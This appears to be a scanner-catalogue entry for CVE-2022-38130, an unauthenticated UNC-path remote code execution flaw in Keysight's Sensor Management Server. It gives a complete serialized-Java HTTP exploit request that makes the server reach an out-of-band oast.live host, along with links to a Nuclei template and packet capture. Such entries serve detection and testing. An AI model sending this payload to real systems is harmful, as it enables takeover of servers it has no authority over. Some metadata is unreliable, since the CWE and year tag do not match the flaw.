| Title | KeySight RF - smsRestoreDatabaseZip UNC path to Remote Code Execution |
|---|---|
| Author | daffainfo,jjcho |
| Severity | Critical |
| Impact | Unauthenticated attackers can control database content, potentially leading to data tampering or execution of malicious code. |
| Remediation | Implement validation and sanitization of the database file path parameter to restrict to trusted locations. |
| CVSS Score | 9.8 |
| EPSS Score | 0.79442 |
| CVE ID | CVE-2022-38130 |
| CWE ID | CWE-89 |
| Tags | cve cve2025 keysight sensor_management_server rce vkev oast oob |
The com.keysight.tentacle.config.ResourceManager.smsRestoreDatabaseZip() method is used to restore the HSQLDB database used in SMS. It takes the path of the zipped database file as the single parameter. An unauthenticated, remote attacker can specify an UNC path for the database file (i.e., \
POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 404
Content-Type: application/x-java-serialized-object
Accept-Encoding: gzip
�� sr 5org.springframework.remoting.support.RemoteInvocation_l���
[ argumentst [Ljava/lang/Object;L
attributest Ljava/util/Map;L
methodNamet Ljava/lang/String;[ parameterTypest [Ljava/lang/Class;xpur [Ljava.lang.Object;��X�s)l xp t 5\\\\d5jmnv1le0o49q576uogre4e36po3yz7k.oast.live\\testpt smsRestoreDatabaseZipur [Ljava.lang.Class;���Z� xp vr java.lang.String��8z;�B xp
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38130.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-38130.pcap
N/AN/A